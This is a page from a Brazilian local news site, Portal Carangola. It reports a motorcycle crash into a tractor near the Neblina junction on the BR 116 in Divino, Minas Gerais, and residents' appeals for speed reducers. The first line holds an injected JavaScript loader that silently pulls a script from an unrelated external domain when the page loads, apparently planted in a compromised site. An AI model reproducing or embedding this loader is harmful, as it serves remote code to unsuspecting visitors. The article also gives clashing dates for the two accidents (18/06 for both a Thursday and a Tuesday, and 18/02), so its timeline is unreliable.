;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Divino - Mais um acidente no trevo de Neblina. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Divino – Mais um acidente no trevo de Neblina.

Por volta das 18h desta última quinta-feira(18/06)  um outro acidente aconteceu próximo ao trevo de Neblina, acesso ao distrito de Bom Jesus do Divino. Cleitom Assis Faustino, 20 anos, condutor de uma motocicleta Twister, não viu e acabou batendo na traseira de um trator que seguia as margens da rodovia BR 116.
A  Vítima foi socorrida por uma ambulância de Divino e conduzida em estado grave para Casa de Caridade de Carangola, onde deu entrada no CTI.Cleitom sofreu  fratura exposta e  possivelmente traumatismo craniano.
A moto ficou completamente destruída.
O trator que seguia puxando um reboque carregado de café saiu rapidamente do local.   A polícia foi acionada.
O  acidente foi bem próximo do local onde ocorreu a colisão com o micro-ônibus da Camargo Correia,  na terça–feira(18/06).
Moradores de Neblina, sensibilizados com estes dois acidentes ocorridos nesta semana, e sabendo do histórico do lugar que diariamente registra graves acidentes, muitos deles com vítimas fatais, pedem providencias às autoridades para que olhem para aquela área e solicitem ao  DNIT  redutores de velocidade no trevo neblina, evitando outros acidentes iguais ou piores.
O trajeto é perigo, possui uma reta longa onde os motoristas geralmente ganham mais velocidade esquecendo que próximo há movimentação de pessoas.
No acidente de segunda-feira(18/02) os redutores poderiam ter impedido a morte do jovem Phillipe Vasconcellos Santos, de 18 anos, natural de Sergipe  que estava a serviço da Camargo Correa.


Fotos e informação: André Valério / O CAMPEÃO – Divino

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.